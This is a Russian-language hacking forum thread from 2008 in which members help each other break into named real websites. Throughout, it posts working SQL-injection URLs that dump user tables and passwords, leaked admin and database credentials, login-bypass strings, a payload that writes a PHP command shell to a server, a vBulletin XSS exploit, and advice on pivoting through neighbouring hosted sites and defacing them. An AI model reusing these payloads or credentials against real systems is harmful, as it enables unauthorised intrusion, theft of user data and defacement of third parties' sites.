могут в самом корне, могут например в www.site.com/admin/, если например админка защищена щтацесом. Права на чтении будет всегда для пользователя от которого работает апач, однако прочитать их обычным запросом браузера типа www.site.com/.htaccess не получиться. Баш хистори обычно лежит в папке юзера, если например сайт в папке /home/someuser/httpdocs/ , то баш хистори в /home/someuser/.bash_history, прав на чтение как правило нет.
Если я тебя правильно понял =()

Велемир
05.08.2008, 17:54
Всем спасибо:) )))))))

Велемир
05.08.2008, 17:57
Насчёт последнего,на виртуальном хосте путь до логов один,а на хостинге - другой.Лог файлов виртуального хоста есть,а системы,на которой хостится этот сайт - нету.Смотрел ErrorLog

Велемир
05.08.2008, 18:54
Ещё вопрос: Почему некоторые поля таблицы не отображаются,хотя присутствуют ?

n0ne
05.08.2008, 20:55
Велемир, они могут быть пустыми

Велемир
05.08.2008, 22:46
Велемир, они могут быть пустыми

Эм...При проверке на NULL взял поле,которое возвращает значение.is+null - не высвечивается ничего.is+not+null - высвечивается содержимое поля,тобишь,если не ноль, данные выводятся,а если ноль - нет?Или писаться NULL должно ? Просто результаты что с *якобы* пустым полем, и с полем со значением - одинаковые.

n0ne
06.08.2008, 08:00
Велемир, я плохой телепат. Напиши полностью запросы которые ты проводишь и ответы на них. Извини, но пишешь ты непонятно)

Велемир
06.08.2008, 12:12
http://www.rtr.spb.ru/People_line/viewmsg.asp?ID=-17775+union+select+1,2,3,4,user,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21+where+user+is+not+null--&FID=17452

Не ноль - выводит данные.

http://www.rtr.spb.ru/People_line/viewmsg.asp?ID=-17775+union+select+1,2,3,4,user,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21+where+user+is+null--&FID=17452

Ноль - не выводит).Так получается ?

Jokester
06.08.2008, 12:38
Велемир
Ты конечно величайший экспериментатор современности, но тебе самому не надоело , что 90% твоих постов просто никто не понимает, а 70% удаляют модераторы?

Прочитай хоть одну книгу по интересующей тебя теме, и все твои вопросы отпадут.

По поводу последнего поста вот онлайн справочник по базам данных:
http://www.sql.ru/docs/

Умоляю тебя, прочитай хоть что-нибудь!!!

Buddah
06.08.2008, 14:19
нашел вот такой сайт

http://www.elementar.de/cms/index.php?id=487&L=-1231314+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63 ,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,8 0,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95/*

попробовал подставить version() в каждое из 95 полей :confused:, как вообще лучше искать то поле (если их например больше 50) куда подставлять нужный код?

n0ne
06.08.2008, 16:49
Buddah, твой пример - слепая инъекция. Слепая, потому что нет вывода. Что бы прочитать какие-то данные из базы используют подзапросы и побуквенно вытаскивают инфу. Почитай это:

1) http://dev.mysql.com/doc/

2) https://forum.antichat.ru/thread19605.html

3) https://forum.antichat.ru/thread35207.html

А по поводу того как лучше искать поле и всё прочее - поле должно иметь вывод на страницу, тебе же надо увидеть какие-то данные? :)

muse
06.08.2008, 16:54
есть сайт http://site.com/index.php
на котором можно залогинится.
я посылаю следующий POST запрос

login=admin'+OR+1=1&password=qwerty

выдает следующую ошибку

[IBM][CLI Driver][DB2/LINUX] SQL0010N The string constant beginning with "'" does not have an ending string delimiter. SQLSTATE=42603 Attempted Query: select c.id,login,password,user_name,org_name,dt_of_birth ,rtrim(who_is) as WHO_IS,"plan",last_login,last_updated,ip_addr,street,city,count ry,zip,phone,icq,email,dish_size,expired,dealer,ma nager,status,c.transponder as transponder,card_type,os_type,c.kind,acl,p.pid as pid,bgp_as,bgp_peer,mac_addr,can_chng_plan,can_pay ,prize_percent,prize_id,mobile,rtrim(type_conn) as type_conn from clients as c left join plans as p on c."plan"=p.id where login='admin\\\' OR 1=1'

из ошибки видно что добавляются слеши и я думаю что изза них и не пропускает...

кто что может посоветовать ???

Buddah
06.08.2008, 17:32
Buddah, твой пример - слепая инъекция. Слепая, потому что нет вывода. Что бы прочитать какие-то данные из базы используют подзапросы и побуквенно вытаскивают инфу. Почитай это:

1) http://dev.mysql.com/doc/

2) https://forum.antichat.ru/thread19605.html

3) https://forum.antichat.ru/thread35207.html

А по поводу того как лучше искать поле и всё прочее - поле должно иметь вывод на страницу, тебе же надо увидеть какие-то данные? :)

спасибо пошел читать

Grey
06.08.2008, 22:42
выдает следующую ошибку

[IBM][CLI Driver][DB2/LINUX] SQL0010N The string constant beginning with "'" does not have an ending string delimiter. SQLSTATE=42603 Attempted Query: select c.id,login,password,user_name,org_name,dt_of_birth ,rtrim(who_is) as WHO_IS,"plan",last_login,last_updated,ip_addr,street,city,count ry,zip,phone,icq,email,dish_size,expired,dealer,ma nager,status,c.transponder as transponder,card_type,os_type,c.kind,acl,p.pid as pid,bgp_as,bgp_peer,mac_addr,can_chng_plan,can_pay ,prize_percent,prize_id,mobile,rtrim(type_conn) as type_conn from clients as c left join plans as p on c."plan"=p.id where login='admin\\\' OR 1=1'

из ошибки видно что добавляются слеши и я думаю что изза них и не пропускает...

кто что может посоветовать ???

Скорее всего ты здесь ничего не сделаешь, т.к. судя по всему мейджик_квотс = он:

Думаю что вначале кавычка экранировалась слешем (который ставился квотой), а затем сам скрипт экранировал повторно и кавычку и слеш (поставленный квотой), т.е. скорее всего даже если мейджик_квотс был равен = офф, ты бы здесь ничего не сделал.

А вообще в таких случая нужно приписывать перед кавычкой слеш (в надежде что мейджик_квотс = офф и что скриптом слеш не будет экранирован), тогда получится что один слеш экранирует другой, а кавычка останется не экранированной ( \\' ).

eLWAux
06.08.2008, 22:48
привет.
ребята, помогите мне пожалуйста вот с етим:
http://alvis.ru/company_news/index.php3?id=-1+union+select+1,2,3,concat_ws(char(58),pwd,login, email),5,6,7,8,9,10,11,12,13,14+from+users/*
а дальше че-т не идет..

через SICT перебрал таблици, вроде есть admin, но доступа у меня к ней нету =(

sabe
06.08.2008, 23:01
привет.
ребята, помогите мне пожалуйста вот с етим:
http://alvis.ru/company_news/index.php3?id=-1+union+select+1,2,3,concat_ws(char(58),pwd,login, email),5,6,7,8,9,10,11,12,13,14+from+users/*
а дальше че-т не идет..
что не идет ?

через SICT перебрал таблици, вроде есть admin, но доступа у меня к ней нету =(
абсолютно верно..
SELECT command denied to user 'alvis'@'localhost' for table 'admin'

eLWAux
06.08.2008, 23:06
ну на запрос к администраторской панели:
http://alvis.ru/admin
просит ввести имя и пароль..
если виполнить предодущий запрос (которий я написал), то ми увидем:
shb09789:www:webmaster@alvis.ru

если вводить ети дание, то админ_панель отказиваетса показиватса =)

Jokester
06.08.2008, 23:10
абсолютно верно..
Не совсем.
Не факт, что таблица есть, натпись "command denied" вылезает так-же при неверном значении таблицы.

http://alvis.ru/company_news/index.php3?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14+from+abracadabra/*

Ну или там есть таблица "abracadabra", и к ней тоже закрыт доступ :D


если вводить ети дание, то админ_панель отказиваетса показиватса =)

А кто сказал что они должны подойти? :)

eLWAux
06.08.2008, 23:14
я посто программой SICT перебирал названия таблиц, и поля, и прога мне сказала что таблица admin сущечтвует =) (а может бить и abracadabra сучествует =))

eLWAux
06.08.2008, 23:15
shb09789:www:webmaster@alvis.ru

лааадно, тогда если ети данние вводить там где пользовател авторизуетса, они тоже не подхолят =Р

если нам виводитса мило, логин и пароль, то должи же они кудо-то подходить =)

Jokester
06.08.2008, 23:20
прога мне сказала что таблица admin сущечтвует
Я и не говорю , что нет, я говорю "не факт"
если нам виводитса мило, логин и пароль, то должи же они кудо-то подходить =)Логично, но они могут быть от чего угодно, ищи ещё какие-то формы входа

И версия sabe в посте ниже , тоже может быть верной

sabe
06.08.2008, 23:20
jokester
ну да.. понятно... я по словам спрашиваещего судил..)

eLWAux
не обезательно должны подходить..... может быть просто наеб или старая таблица.. так как она имеет уж очень стандартное название.. и я думаю ты не первый этот сайт взламываеш.. )

и еще приведенная тобой админка
http://alvis.ru/admin
использует basic auth. нарвеника пассы лежат в этой же дикертории )

eLWAux
06.08.2008, 23:23
ок!
тогда что получаетса:
таблица admin, допустим, существует, и в ней, наверное, админ_пароли и админ_логини..
НО, доступу к ней у нас нету =(

а в таблице users, которая нам доступна, ми получаем имени, пароли, мило (кстати, их всего 4штука), но они никуда не подходят =(

что же, сайт уязвимий, но получит админ нереально?

sabe
06.08.2008, 23:27
eLWAux
не факт что эта таблица пренадлежит базе этого сайта )

да.. думаю глухая тема..

eLWAux
06.08.2008, 23:29
прости, sabe, но я знаю что сайт возможно hack на 100%
передо мною его уже hackали

sabe
06.08.2008, 23:44
да не все ок.) это токо мое мнение....... все возможно )

Grey
07.08.2008, 00:04
to eLWAux

Мой тебе совет не вцепляйся в одну sql инъекцию, вполне возможно что доступ к админке ограничен с помощью .htaccess и .htpasswd, т.е. пароль на админку лежит в файле, а не в БД.

Что тут можно сделать?

Мне кажется Реверс айпи тут может принести пользу и не малую, сам глянь - сайтов там хостится не много, вполне возможно что хост кривой и имя шелл на соседнем сайте ты даже без рута сможешь смотреть содержимое нужного тебе сайта (в своей практике я довольно часто такое встречаю).
Также вполне возможно что какой нидь из соседних сайтов крутится под root-овским пользователем БД, так что копай соседние сайты (да и этот проверь хорошнько - вдруг найдешь инклуд или читалку файов, а они могут сильно помочь).

eLWAux
07.08.2008, 00:21
to Grey:
понимаеш, я только начинаю свой путь хакера =)
,и сейчас у меня период SQL инекций =)
вот я и должен ЕТУ инекцию добить =)

sabe
07.08.2008, 00:31
имменно из этой скули ты врятле чтот достаниш..... Grey правду говорит.. очень приятно когда залив шелл на один сайт.. получаеш доступ еще к десятке..))

eLWAux
07.08.2008, 00:33
хорошо =)
..p.s.: тогда где об етом можна прочитать?

sabe
07.08.2008, 00:36
идеш сюда...... http://wservices.ru/reverseip.php
смотриш все сайты на сервере...
потом ищеш способ залить шелл на одном из них.. то ли методом sql/php иньекции..... то ли другими возможностями...

Red_Red1
07.08.2008, 02:20
2 eLWAux по поводу сайта alvis.ru

Нашел возможность зайти под любым зареганым юзером, для этого в поле пароль пишем такое 1' or 1=1 limit Х,1/*
где Х перебираем от 0 до количества зареганых юзеров.
Также есть таблица clients но из нее нифига не выводит (может у меня руки не от туда). Имхо в этой табличке и хранятся данные юзеров, но вот как добыть их хз

sabe
07.08.2008, 07:18
Red_Red1
нам нужен админ ))))

eLWAux
07.08.2008, 12:12
ммм, да 1' or 1=1 limit Х,1/* работает =) ето уже хорошо..
доступ к любому пользователю у нас тепер есть!
ето уже хорошо..
остался доступ к админке =)

Nea7
07.08.2008, 13:00
вот в таком представление хранятся пароли в таблице:
'xIAЖИO®Ык§\0ЛMуЎШЄЦ°`Ж',
'СЛi›Ъј9Qb п7є.',

как их правильно отобразить?

Jokester
07.08.2008, 13:11
вот в таком представление хранятся пароли в таблице:
'xIAЖИO®Ык§\0ЛMуЎШЄЦ°`Ж',
'СЛi›Ъј9Qb п7є.',

как их правильно отобразить?
Если convert или UNHEX/HEX не прокатывает , то скорее всего пароли закриптованы aes_encrypt ,с ключом который ты не знаешь, или самописной кодировкой, тоесть врятли ты их увидишь

eLWAux
07.08.2008, 16:10
ребята, кароце я все понял про alvis.ru:
админ иногда вирубивает доступ к alvis.ru/admin
и поетому иногда не получаетса туда попасть..
а вот и сам админ:
pwd = shb09789
login = www
mail = webmaster@alvis.ru

проблему с сайтом решено !!

СПАСИБО всем кто мне дал помощ =)

eLWAux
08.08.2008, 01:01
и ето опять я =)
вот ещо один сайт kino.ru
вроде SQL есть..
http://kino.ru/cinema.php?id=152' но при етом ошибка не появляетса
http://kino.ru/cinema.php?id=152+AND+1=1/* все ок!
http://kino.ru/cinema.php?id=152+AND+1=2/* пусто!
я думаю ето SQL инекция =)
но, я уже и substring и union select 1,...../* пробовал,
но при етих запросах никак немогу понят, ответ GOOD или нет=)

krypt3r
08.08.2008, 09:07
По-моему, ты ошибся. При всех запросах выводится одно и то же. Поищи скулю в "поиске" =)

111' union select 1,2,3,4,5 from email limit 950,1/*

xWhitex
08.08.2008, 16:34
Собствено такой вопрос Sql выдает пароль, и логин но в админку незаходит.
вот пример:
http://www.ssw-pruefsysteme.de/i_shop/shopdisplayproducts.asp?cat='%20union%20select%201 ,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37%20from%20tbluser"having%201=%201--sp_password

А вот сама админка:
http://www.ssw-pruefsysteme.de/i_shop/ssw_shopadmin35.asp

Собствено что можно зделать?

Ershik
08.08.2008, 17:25
Возможно стоит блок по ай-пи. То есть в админку может заходить только с ай-пи 75.125.150.120 - к примеру.

eLWAux
09.08.2008, 00:50
xWhitex: ну или (так как у меня с alvis.ru било) просто вход в админку иногда вирубивають =(

WAR!9G
09.08.2008, 00:56
Собствено что можно зделать?
Эмм, ну вобщето ты получил пасс от самой базы данных, а не пасс от админки ;)

DDoSька
09.08.2008, 03:07
Здрастье =)
у меня вопрос:
http://www.pixheaven.net/galerie_us.php?id=-3+union+select+1,2,3,4,5,6,7,8,9/*
Вот скуля,принтабельное поле - 7
http://www.pixheaven.net/galerie_us.php?id=-3+union+select+1,2,3,4,5,6,version(),8,9/*
http://s56.radikal.ru/i151/0808/4c/cd44db41a1a4.jpg (http://www.radikal.ru)
J\Очень интересно выводиться версия,можно ли вывести данные кроме version()???
Заранее спасибо

MirA
09.08.2008, 03:36
Здрастье =)
у меня вопрос:
+select+1,2,3,4,5,6,7,8,9/*
Вот скуля,принтабельное поле - 7

http://s56.radikal.ru/i151/0808/4c/cd44db41a1a4.jpg (http://www.radikal.ru)
J\Очень интересно выводиться версия,можно ли вывести данные кроме version()???
Заранее спасибо

скорее всего нет,я думаю,там стоит ограничение по типу данных и по длине...

а у меня такой вопрос:
почему не проходит конструкция ?
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,0x3c3f207379 7374656d28245f4745545b27636d64275d293b203f3e,3,4,5 +from+main_data2.admin+into+outfile+0x2f7661722f77 77772f666f72756d2f7368656c6c2e706870/*
0x3c3f2073797374656d28245f4745545b27636d64275d293b 203f3e - <? system($_GET['cmd']); ?>
0x2f7661722f7777772f666f72756d2f7368656c6c2e706870 - установочная дирректория /var/www/forum/shell.php

Ponchik
09.08.2008, 03:46
В Into Outfile нельзя использовать Hex значения, только коквычки

Гы гы, connect.php
<?
$Host = "localhost";
$User = "root";
$Password = "123456";

$Database_name = "forum";

$Link = mysql_connect ($Host, $User, $Password) or die(mysql_error());
mysql_select_db($Database_name,$Link) or die(mysql_error());
?>

Мощный пароль на рута :D

K1nD[e]R
09.08.2008, 03:57
http://www.pixheaven.net/galerie.php?id=-5+union+select+1,2,3,4,5,6,version(),8,9+from+mysq l.users/*
повидимому вслепую видно что ето версия 4.1.x
да и SELECT command denied to user 'pixheavennet'@'10.0.85.212' for table 'usersнет доступа на чтение..

DDoSька
09.08.2008, 05:10
R']http://www.pixheaven.net/galerie.php?id=-5+union+select+1,2,3,4,5,6,version(),8,9+from+mysq l.users/*
повидимому вслепую видно что ето версия 4.1.x
да и SELECT command denied to user 'pixheavennet'@'10.0.85.212' for table 'usersнет доступа на чтение..
Почему же четвертая? Если выводиться,что пятая?
http://www.pixheaven.net/galerie_us.php?id=-3+union+select+1,2,3,4,5,6,7,8,9/*
Увидишь,что принтабельно поле 7,а когда вводишь version() ,то активируется\загарается цифра ПЯДЬ :eek:

superboys
09.08.2008, 10:46
кто поможет
http://evo.nightspirits.net/indexframe.php?razdel=registration'
вот нашёл такую дыру кто скажет можно её дальше раскроить?

Grey
09.08.2008, 14:05
кто поможет

вот нашёл такую дыру кто скажет можно её дальше раскроить?

http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/*

Кстати там ещё таблица users есть.

K1nD[e]R
09.08.2008, 22:01
Почему же четвертая? Если выводиться,что пятая?

Увидишь,что принтабельно поле 7,а когда вводишь version() ,то активируется\загарается цифра ПЯДЬ :eek:
а ты введи вместо (7) цифру 3 и увидиш загоритсо цифра 3...

Jokester
09.08.2008, 22:33
K1nD[e]R,DDoSька

Версия 5 полей с выводом нет(в этом месте), цифра которая выводится(активируется) это не вывод, но её можно использовать как индикацию true

Тоесть:

http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=3
цифра не активна false

http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=4
цифра не активна false

http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=5
цифра зажглась true

Или ищи вывод в другом месте, или подзапросы

DDoSька
10.08.2008, 01:20
Вот мой не похек (((( помогите пожалуйстА!
http://football.kapook.com/webboard_view_guest.php?qid='4595
http://mrdriver.com/device.php?id=33714'
http://driversdb.com/device.php?id=107971'
2 последних..вообще как одинаковые...

n0ne
10.08.2008, 01:27
K1nD[e]R, mysql.userS не существует. Есть mysql.user

tor4)
10.08.2008, 05:21
DDoSька

http://football.kapook.com/team.php?id=13%27+union+select+1,2,3,4,5,6,7,conca t(0x3a,user,0x3a,password),9,10,11,12,13,14,15,16, 17,18,19,20+from+mysql.user/*
:root:612382396d951d43

http://mrdriver.com/device.php?id=-33714%27+union+select+version()/*
5.0.24-standard
Не будем перебирать все таблицы и посмотрим на сайт.
Стоит форум mybb пробуем табл mybb_users
http://mrdriver.com/device.php?id=-33714%27+union+select+concat(uid,0x3a,loginkey,0x3 a,password,0x3a,email,0x3a,icq)+from+mybb_users+li mit+0,1/*

1:sekysvwGmEE5uCfSHMKdK1uAUdrykTa6XkwLbNSnsxli1Q2D 7h:24a1de6ebae6c9497fac8e1c328d8fa2:webmaster@mrdr iver.com:
Всё зашифровал))) гад.


http://driversdb.com/device.php?id=-107971%27+union+select+concat(uid,0x3a,loginkey,0x 3a,password,0x3a,email,0x3a,icq)+from+mybb_users+l imit+0,1/*

1:7T6Jlse4WHMFWtJax9OsOVgLqmWoufnlzPDkCtHGFleS9YZm W4:e7cf5c7cf184622332e2bc347a38659a:forum@driversd b.com:

superboys
10.08.2008, 11:55
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/*

Кстати там ещё таблица users есть.
можно попонятнее разъяснить где что я нуп))

Grey
10.08.2008, 13:49
можно попонятнее разъяснить где что я нуп))

https://forum.antichat.ru/threadnav43966-1-10.html

superboys
10.08.2008, 14:15
Да уже всё репку накинул))

S0ulVortex
10.08.2008, 14:50
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5, 6,7,8,9,0/*
Помогите новичку дальше незнаю что делать :)

S00pY
10.08.2008, 15:59
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5, 6,7,8,9,0/*
Помогите новичку дальше незнаю что делать :)
_http://www.safelider.ru/view.php?item=-2877+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,log in,password),9,0+from+users/*


Table [banners] Table [catalog] Table [catalog_picture] Table [catalog_struct] Table [catalog_text] Table [db_pics] Table [feature_bind] Table [feature_group] Table [feature_type] Table [fotobank] Table [invoice] Table [link_catalog] Table [manufactures] Table [news] Table [pages] Table [pricelist] Table [tovar] Table [users]

S0ulVortex
10.08.2008, 16:23
_http://www.safelider.ru/view.php?item=-2877+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,log in,password),9,0+from+users/*


Table [banners] Table [catalog] Table [catalog_picture] Table [catalog_struct] Table [catalog_text] Table [db_pics] Table [feature_bind] Table [feature_group] Table [feature_type] Table [fotobank] Table [invoice] Table [link_catalog] Table [manufactures] Table [news] Table [pages] Table [pricelist] Table [tovar] Table [users]
Спс биг а как мне терь найти папку с бд

eLWAux
10.08.2008, 16:53
?item=-1+union+select+1,2,concat_ws(char(58),user(),datab ase(),version()),4,5,6,7,8,9,0/*
user: u13238@10.10.223.207
database: u13238_2
version: 5.0.45-log
подбирай таблици..

superboys
10.08.2008, 17:33
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/* а можно отсюдова файлы посмотреть?

~!DoK_tOR!~
10.08.2008, 18:03
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/* а можно отсюдова файлы посмотреть?


нет

superboys
10.08.2008, 22:40
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/* а как не локальный сервер получить майсикьюла пробывал некоторые значения не прокатило*?

Don Anton
10.08.2008, 22:46
должно пройти, не может быть

superboys
10.08.2008, 22:54
Вот он мне выдаёт
4

версия 4.1.9|используемая база db2255b| на запрос пасса 606717756665bce6|юзер us2255a@localhost

6, Хитрый Чен=))

AARON
11.08.2008, 00:06
Ситуация: Откопал кем-то залитый ремвью на кажись польский сайт. получил доступ к базе. Прав на запись нету. Есть логин\пасс админа, правда чет не заходит :) может не туда ввожу, сайт-то польский.
Что можно сделать кроме как удалить\перезалить базу? :)

~!DoK_tOR!~
11.08.2008, 01:08
Что можно сделать кроме как удалить\перезалить базу?

что душе угодно )

AARON
11.08.2008, 01:26
Ну тогда помоги, пожалуйста, задефейсить :) Или хоть направь куда копать. Поиск не помог.

~!DoK_tOR!~
11.08.2008, 03:19
редактируй index.php

SVAROG
11.08.2008, 04:36
при запросе id=2'
получаю сообщение
DBI debuging message / Отладочное сообщение DBI
Error / Ошибка Could not Parse Query
Query / Запрос select id,one,name from pb_portal where id=2\'
Description / Описание You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
там как я понял фильтрация какаято, хелп
http://www.paintball.ru/next.php?id=2'

Girsoft
11.08.2008, 05:29
скажите как называется таблица с "солью" в новых версиях и где она лежит? и подскажите плиз какого вида функция шифровки пароля в ИПБ-формух?

Girsoft
11.08.2008, 07:26
И ещё подскажите. Вот ситуация:

Есть локальный инклуд. логов не нашёл. На поддомене есть форум. адресв вида:

forum.site.ru
и есть возможность туда загружать файлы. Но вот проблема: я не знаю как прописать путь до форума! Если ИП адрес их отличается - это значит что они на разных компах? (205.222.222.123 и 205.222.222.124)

site.ru/forum/ не катит =(

site.ru/ins.php?inc=../../../etc/passwd%00

кто что думает по данному поводу?

aka PSIH
11.08.2008, 08:02
скажите как называется таблица с "солью" в новых версиях и где она лежит? и подскажите плиз какого вида функция шифровки пароля в ИПБ-формух?
SQL Databases (http://up.cih.ms/ettee/sql/)

логов не нашёл.
пробуй httpd.conf (https://forum.antichat.ru/thread49775.html) поискать...

не знаю как прописать путь до форума!
https://forum.antichat.ru/showthread.php?t=30632

сли ИП адрес их отличается - это значит что они на разных компах? (205.222.222.123 и 205.222.222.124)
не обязательно... ;)

sabe
11.08.2008, 08:14
что тут можно зделать ?
http://interfilm.ru/takelogin.php?returnto=&username=admin&password=9999999+union+select+1
и вот тут
http://www.photodom.com/ru/catalog.php?page=0&id=9999999)+union+select+1,2,3,4,5,6,7,9,10/*
а также здесь знаю что юнион использовать нельзя.. но все же..
http://www.aldebaran.ru/gb/index.php?entry=25+union+all+select+1/*
netframework - хз как разкрутить..
http://zman.com/news/category.aspx?CategoryId=20'

SVAROG
http://www.paintball.ru/next.php?id=99999+union+select+1,2,table_name+from +information_schema.tables+limit+17,1--
баян..

superboys
11.08.2008, 10:36
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),database(),password(0),user()))),6, 7,8,9/* кто знает как тут нарыть удалённый адрес для БД

Jokester
11.08.2008, 10:58
2 sabe

http://interfilm.ru/takelogin.php
Пишет что нет коннекта с базой, что ты хочешь от него

Сдесь пятая ветка без вывода,подзапросы:
http://www.photodom.com/ru/catalog.php?page=0&id=9)+and+substring(version(),1,1)=5/*

Сдесь лимит после ордер влиять на запрос можно только подставляя 2-е значение лимита:
http://www.aldebaran.ru/gb/index.php?entry=25,1/*
тоесть никак

это ошибка введённых данных использовать можно только расскрытие пути
http://zman.com/news/category.aspx?CategoryId=20

nicusor
11.08.2008, 12:08
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),database(),password(0),user()))),6, 7,8,9/* кто знает как тут нарыть удалённый адрес для БД
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/*

superboys
11.08.2008, 12:34
сёравно @localhost

TehRn
11.08.2008, 15:07
XSS-base64

_http://securityvulns.ru/news/CGI/2008.06.14.html
_http://securityvulns.ru/news/CGI/2008.06.19.html

Exploit: http://localhost/vB3/admincp/index.php?redirect=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

Помогите разобраться как использовать данную XSS заранее спс.

MaSTeR GэN
11.08.2008, 20:52
2TehRn собственно ф чем проблема то ?
"PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" Это не что иное как закодированный base64 "<script>alert('XSS')</script>" ;) собтвенно кодируй то что нужно в base и вставляй это пассивная xss на форуме оч многа написанно по этой теме читай ;)

mr.The
11.08.2008, 20:53
Подобрал количество полей. всё гуд, ошибки нету, но и ничего не выводит. где трабл?
http://test.livani.lv/lat/aktualitates/aktualitates/?doc=55555551661+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14/*

MaSTeR GэN
11.08.2008, 21:07
2mr.The если мне зрение не изменяет тама нету полей для вывода один выход слепая иньекция ;)

mr.The
11.08.2008, 21:24
2MaSTeR GэN
и на том спасибо. а я думал туплю где-т

Girsoft
11.08.2008, 23:57
подцепил локальным инклудом файлы

/etc/passwd
etc/httpd/conf/httpd.conf

нашёл файл
phpinfo.php

из httpd.conf видно, что на хостинге есть ещё сайты. такая запись:




<VirtualHost *:80>
ServerAdmin mail@gmail.com
DocumentRoot /home/SITENAME/public_html
ServerName www.SITENAME.com
ServerAlias SITENAME.com
ErrorLog /dev/null
CustomLog /dev/null common
SetOutputFilter DEFLATE
DeflateFilterNote ratio
SetEnvIfNoCase Request_URI \.(?:gif|jpe?g|png)$ no-gzip dont-vary
SetEnvIfNoCase Request_URI \.(?:exe|t?gz|zip|bz2|sit|rar)$ no-gzip dont-vary
SetEnvIfNoCase Request_URI \.pdf$ no-gzip dont-vary
ExpiresActive On
<Directory /home/SITENAME/public_html>
AllowOverride All
ExpiresByType application/x-shockwave-flash A0
ExpiresByType text/javascript A2419200
ExpiresByType text/plain A2419200
ExpiresByType text/html A300
ExpiresByType text/css A2419200
ExpiresByType image/gif A2419200
ExpiresByType image/jpeg A2419200
ExpiresByType image/png A2419200
</Directory>
</VirtualHost>



но приинклудить из них ничего не получается. видимо, такие настройки.

логов не нашёл =/
Загружать никаких файлов туда нельзя.

что мне можно сделать, чтобы хакнуть этот сайт?

По поводу /etc/passwd, знаю что брутят по маске Логин:Логин фтп, ссх. Скажите пожалуйста, какими брутфорсами это можно провернуть, кроме Гидры, не дружу с ней.

~!DoK_tOR!~
12.08.2008, 00:07
ServerName www.SITENAME.com )

но приинклудить из них ничего не получается. видимо, такие настройки.

такого сайта нет вот и не получается проинклудить SITENAME.com )

Girsoft
12.08.2008, 00:18
нет нет. Это я изменил имя, дабы не светить сервер

superboys
12.08.2008, 00:58
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),database(),password(0),user()))),6, 7,8,9/* кто знает как тут нарыть удалённый адрес для БД + можно там файлы посмотреть через иньекцию

AARON
12.08.2008, 02:38
Не знал куда написать. Решил сюда.
Проблема с заливкой шелла. Шелл на holm.ru, но там есть пхп, поэтому он исполняется, а некопируется... Пробовал в .htaccess прописать AddType application/force-open .php - не помогло, как видите... на холме открывается загрузка файла, на сайте с инклюдом - каракули... Подскажите что путевое в htaccess прописать чтоб пахало :)

sabe
12.08.2008, 05:10
help:
http://www.world-art.ru/games/games.php?id=4575+or+1=1
есть иньекция ?
http://www.litprom.ru/text.phtml?storycode=1'

Calcutta
12.08.2008, 08:11
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359'
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359+order+by+5--
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359+union+select+1,2,3,4,5--
инъекция есть, но с раскруткой проблемы. подскажет кто?

base
12.08.2008, 09:16
http://www.world-art.ru/games/games.php?id=4575+or+1=1
инъекта нет
http://www.litprom.ru/text.phtml?storycode=1'
блинд скул
http://www.litprom.ru/text.phtml?storycode=-9999999991+union+select+1,2/*
http://www.litprom.ru/text.phtml?storycode=-9999999991+union+select+1/*
инъект есть, вывода нет
читай Blind Sql Inj

Glazz
12.08.2008, 09:53
help:



есть иньекция ?
http://www.world-art.ru/games/games.php?id=4575+or+1=1


Я не уверен, но разве в SQL инъекции когда подбирают кол-во полей , ставят or 1=1?

sabe
12.08.2008, 10:33
Glazz
это определение.. )

base
наверно ты прав.. )

http://kinomob.info/system/thumb.php?img_id=1+union+select+version()--
